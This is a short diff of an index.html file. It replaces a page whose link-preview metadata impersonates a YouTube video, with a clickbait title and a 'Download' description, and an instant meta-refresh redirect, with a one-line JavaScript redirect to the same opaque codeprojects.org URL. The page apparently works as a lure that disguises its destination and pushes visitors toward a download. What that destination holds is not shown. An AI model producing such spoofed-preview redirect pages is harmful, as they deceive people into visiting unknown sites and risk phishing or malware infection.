--- a/index.html
+++ b/index.html
@@ -1,16 +1,1 @@
-<!DOCTYPE html>
-<html>
-  <head>
-<meta charset="windows-1252">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <meta property="og:url" content="https://www.youtube.com/watch?v=gK-ZDWnwy8g">
-    <meta property="og:title" content="I was going to send it to you tomorrow but I decided to do it now 💯🆕">
-    <meta property="og:image" content="https://a.mailmunch.co/attachments/assets/000/470/225/large/133115925_112984550691889_3203188319832166266_n.jpg?1617745897">
-    <meta property="og:image:width" content="1280">
-    <meta property="og:image:height" content="720">
-    <meta property="og:description" content="Download">
-  </head>
-  <body>
-   <meta http-equiv="refresh" content="0; URL=https://codeprojects.org/5OjLVAfz4D5tsDRYVmj0szP55jHjtQpvRLIVYmPkgwM" />
-  </body>
-</html>
+<script> location.href = "https://codeprojects.org/5OjLVAfz4D5tsDRYVmj0szP55jHjtQpvRLIVYmPkgwM";  </script>
